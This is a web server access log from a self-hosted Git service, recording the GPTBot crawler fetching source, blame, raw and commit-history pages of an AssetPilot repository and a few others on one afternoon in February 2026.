"/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14836] [Gzip 9.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 10130] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" -[17/Feb/2026:13:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15418] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11842] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16125] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 19063] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11325] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15695] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" -[17/Feb/2026:13:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14245] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker" [Client 74.7.227.38] [Length 174842] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2ftemplates" [Client 74.7.227.38] [Length 29260] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" -[17/Feb/2026:13:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15794] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14302] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" -[17/Feb/2026:13:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:30:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:30:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:30:59 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/favicon.ico" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16393] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16359] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18146] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:31:04 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/js/app.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16565] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10451] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22876] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10015] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 74.7.227.38] [Length 15997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15728] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15760] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14271] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html?display=rendered" [Client 74.7.227.38] [Length 14442] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" -[17/Feb/2026:13:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" -[17/Feb/2026:13:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 